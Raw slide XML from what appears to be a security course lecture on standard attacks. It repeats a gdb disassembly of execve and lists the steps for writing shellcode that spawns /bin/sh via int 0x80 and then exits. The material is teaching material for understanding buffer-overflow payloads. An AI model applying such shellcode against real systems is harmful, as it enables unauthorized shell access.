            <a:ext cx="8005762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Standard Security Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92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13" y="1008063"/>
            <a:ext cx="4065587" cy="531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14333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9600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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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0x10(%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&lt;+5&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    0xc(%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&lt;+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    0x8(%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&lt;+13&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xb,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+18&gt;:    call   *0x80ef5a4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+24&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xfffff000,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+29&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     0x8053b01 &lt;execve+33&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+31&gt;: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&lt;+32&gt;:    ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+33&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xffffffe8,%edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+39&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>neg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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%gs:0x0,%ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+48&gt;: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,(%ecx,%edx,1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+51&gt;:    or     $0xffffffff,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+54&gt;: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&lt;+55&gt;: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9144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6594" y="1359157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Save the frame pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12147653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9600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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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0x10(%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&lt;+5&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    0xc(%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&lt;+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    0x8(%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&lt;+13&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xb,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+18&gt;:    call   *0x80ef5a4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+24&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xfffff000,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+29&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     0x8053b01 &lt;execve+33&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+31&gt;: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&lt;+32&gt;:    ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+33&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xffffffe8,%edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+39&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>neg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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%gs:0x0,%ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+48&gt;: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,(%ecx,%edx,1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+51&gt;:    or     $0xffffffff,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+54&gt;: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&lt;+55&gt;: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12192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6594" y="1359157"/>
            <a:ext cx="3810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Move the third parameter (NULL) into %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>edx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3852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9600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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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0x10(%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&lt;+5&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    0xc(%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&lt;+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    0x8(%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&lt;+13&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xb,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+18&gt;:    call   *0x80ef5a4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+24&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xfffff000,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+29&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     0x8053b01 &lt;execve+33&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+31&gt;: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&lt;+32&gt;:    ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+33&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xffffffe8,%edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+39&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>neg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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%gs:0x0,%ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+48&gt;: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,(%ecx,%edx,1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+51&gt;:    or     $0xffffffff,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+54&gt;: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&lt;+55&gt;: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158109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6594" y="1359157"/>
            <a:ext cx="381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Move the second parameter (the address of array) into %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ecx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51548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9600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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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0x10(%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&lt;+5&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    0xc(%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&lt;+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    0x8(%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&lt;+13&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xb,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+18&gt;:    call   *0x80ef5a4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+24&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xfffff000,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+29&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     0x8053b01 &lt;execve+33&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+31&gt;: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&lt;+32&gt;:    ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+33&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xffffffe8,%edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+39&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>neg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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%gs:0x0,%ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+48&gt;: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,(%ecx,%edx,1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+51&gt;:    or     $0xffffffff,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+54&gt;: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&lt;+55&gt;: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188589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6594" y="1359157"/>
            <a:ext cx="3810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Move the first parameter (the address of “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>”) into %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ecx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40321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9600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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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0x10(%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&lt;+5&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    0xc(%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&lt;+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    0x8(%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&lt;+13&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xb,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+18&gt;:    call   *0x80ef5a4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+24&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xfffff000,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+29&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     0x8053b01 &lt;execve+33&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+31&gt;: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&lt;+32&gt;:    ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+33&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xffffffe8,%edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+39&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>neg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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%gs:0x0,%ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+48&gt;: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,(%ecx,%edx,1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+51&gt;:    or     $0xffffffff,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+54&gt;: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&lt;+55&gt;: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213360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46594" y="1359157"/>
            <a:ext cx="381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Move 0xb into %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>eax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3035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09600" y="609600"/>
            <a:ext cx="7848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Dump of assembler code for function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+0&gt;:     push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&lt;+1&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    0x10(%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&lt;+5&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    0xc(%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&lt;+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>),%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&lt;+13&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xb,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+18&gt;:    call   *0x80ef5a4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+24&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xfffff000,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+29&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     0x8053b01 &lt;execve+33&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+31&gt;: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&lt;+32&gt;:    ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+33&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0xffffffe8,%edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+39&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>neg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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&lt;+41&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    %gs:0x0,%ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+48&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,(%ecx,%edx,1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+51&gt;:    or     $0xffffffff,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+54&gt;:    pop   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&lt;+55&gt;:    ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>End of assembler dump.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09600" y="2419290"/>
            <a:ext cx="4800600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486400" y="1295400"/>
            <a:ext cx="3810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Call into the kernel model.  *0x80ef5a4 is a wrapper function.  The simplest way is to call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 80.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9350462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" y="1600200"/>
            <a:ext cx="8001000" cy="4832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rabicParenBoth"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Put the address of /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicParenBoth"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Ensure /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> is null terminated with a '\0’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicParenBoth"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Put the address of /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> in array[0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicParenBoth"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Put a four-byte NULL in array[1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicParenBoth"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Put the address of the array into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicParenBoth"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Put a NULL into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicParenBoth"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Put 0xb in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicParenBoth"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicParenBoth"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Store 0x0 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicParenBoth"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Store 0x1 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicParenBoth"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 0x80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76710" y="5141166"/>
            <a:ext cx="4670580" cy="1323439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23277" y="5410200"/>
            <a:ext cx="236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exit(0)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="373983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7200" y="1905000"/>
            <a:ext cx="86868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???? %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
